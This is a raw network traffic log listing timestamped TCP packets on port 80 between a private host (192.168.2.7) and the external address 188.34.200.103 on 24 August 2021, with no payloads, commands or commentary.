Aug 24, 2021 08:46:58.482978106 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.482992887 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483000040 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483023882 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483031988 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483047962 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483067989 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483072996 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483097076 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483110905 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483149052 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483155966 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483175993 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483196974 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483198881 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483222961 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483232975 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483251095 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483259916 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483273983 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483298063 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483302116 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483320951 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483340025 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483344078 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483366013 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483376026 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483392954 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483414888 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483424902 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483449936 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483453035 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483474016 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483494043 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483496904 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483520985 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483539104 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483551025 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483563900 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483577013 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483599901 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483604908 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483625889 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483628035 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483650923 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483654976 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483675003 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483680010 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483700037 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483705997 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483725071 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483730078 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483748913 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483755112 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483772993 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483781099 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483795881 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483805895 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483820915 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483830929 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483845949 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.483855963 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483880997 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.483900070 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.619436026 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.644731045 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645119905 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645163059 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645184994 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645206928 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645227909 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645250082 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645271063 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645294905 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645338058 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645360947 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645381927 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645402908 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645418882 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645457029 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645478010 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645500898 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645523071 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645554066 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645574093 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645576000 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.645595074 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645786047 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645822048 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645843983 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645864010 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645879984 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645915031 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645939112 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645961046 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.645982027 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646004915 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646013021 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646034956 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646056890 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646015882 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646078110 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646099091 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646121979 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646126986 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646128893 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646131992 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646132946 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646136045 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646155119 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646176100 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646199942 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646220922 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646241903 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646265984 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646271944 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646271944 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646275997 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646294117 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646318913 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646341085 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646362066 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646378994 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646414042 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646435022 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646456003 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646477938 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646502018 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646506071 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646538973 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646656036 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646681070 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646703959 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646723986 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646744967 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646684885 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646775961 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646779060 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646780014 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646783113 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646785975 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646789074 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646791935 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646817923 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646840096 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646842957 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646846056 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646864891 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.646898985 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646903038 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646904945 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646908045 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646913052 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646915913 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646920919 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646958113 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646961927 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646965981 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646970034 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646974087 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.646977901 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.647007942 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.647012949 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.647087097 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647125006 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647150040 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647171974 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647228003 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647253036 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647279978 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647300005 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647320032 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647336960 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647358894 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647375107 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647392035 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647409916 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647435904 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647453070 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647475004 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647491932 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647512913 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647533894 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647557020 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647576094 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647597075 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647618055 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647635937 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647655964 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647672892 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647695065 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647717953 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647735119 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647758007 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647779942 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647802114 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647823095 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647845030 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647866011 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647888899 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647911072 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647927999 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647804022 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.647949934 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647981882 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.647985935 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.647986889 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.647991896 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.647995949 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648004055 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648021936 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648041964 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648058891 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648076057 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648096085 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648116112 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648140907 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648159027 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648184061 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648205996 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648226976 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648243904 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648251057 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648251057 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648273945 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648296118 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648317099 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648333073 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648350000 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648355007 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648359060 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648359060 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648361921 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648365021 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648367882 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648372889 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648376942 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648380995 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648385048 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648405075 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648405075 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648408890 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648446083 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648448944 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648467064 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648469925 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648487091 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648489952 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648489952 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648510933 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648513079 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648514986 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648535013 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648555994 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648572922 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648580074 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648581028 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648603916 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648605108 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648627043 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648649931 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648653030 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648670912 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648673058 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648689985 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648691893 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648710966 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648714066 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648735046 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648758888 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648781061 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648797989 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648801088 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648818016 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648838043 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648838997 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648857117 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648863077 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648885012 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648900986 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648921967 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648921967 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648940086 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648943901 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648967028 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.648967981 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.648991108 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.649012089 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.649034023 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.649055004 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.649061918 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.649127007 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.652532101 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652605057 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652626038 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652647018 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652667046 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652755976 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652760029 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.652780056 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652806044 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652810097 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.652827024 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652848959 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652848959 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.652870893 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652889013 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.652893066 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.652959108 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.652986050 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.653265953 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.654726028 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.654731989 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656385899 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656512976 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656539917 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656563044 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656584024 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656606913 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.656610012 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656642914 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.656646967 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.656666040 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:58.656769037 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656794071 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656815052 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656838894 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656903028 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656925917 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656970024 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.656996012 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657017946 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:58.657040119 CEST	80	49719	188.34.200.103	192.168.2.7
